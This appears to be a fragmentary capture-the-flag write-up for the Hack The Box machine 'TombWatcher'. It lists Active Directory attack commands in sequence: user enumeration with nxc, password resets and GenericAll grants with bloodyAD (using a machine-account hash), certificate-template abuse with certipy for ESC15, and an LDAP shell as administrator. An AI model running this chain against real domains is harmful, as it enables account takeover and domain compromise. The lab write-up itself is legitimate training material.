Tomb Watcher
Tomb Watcher
nxc smb tombwatcher.htb -u henry -p 'H3nry_987TGV!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' |
awk '{print $1}’
TombWatcher 1
bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u 'ansible_dev$' -p :1c37d00093dc2a5f25176bf2d474afdc set
password 'SAM' 'Password123!'
TombWatcher 2
bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' add genericAll "john" "sam"
bloodyAD --host 10.10.11.72 -d "tombwatcher.htb" -u "sam" -p 'Password123!' set password "john" 'Feb@2015'
TombWatcher 3
OR
Confirm that the object has been restored by querying the object properties.
Get-ADUser -Identity cert_admin -Properties *
TombWatcher 4
Enable the restored AD account if it’s properties show disabled.
I used certipy to validate the security posture assessment to list all vulnerable
certificate templates due to unpatched AD CS servers.
certipy find -u cert_admin@tombwatcher.htb -p 'Feb@2015' -dc-ip 10.10.11.72 -vulnerable
TombWatcher 5
💡 From the results, the server is vulnerable to CVE-2024-49019. ESC15
vulnerabilities allow non-privileged users to issue certificates that can
authenticate as high-privileged accounts, posing a severe security
threat.
https://learn.microsoft.com/en-us/defender-for-identity/prevent-
certificate-enrollment-esc15
TombWatcher 6
Use Certificate for LDAP Shell Access
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.72 -domain tombwatcher.htb -ldap-shell
TombWatcher 7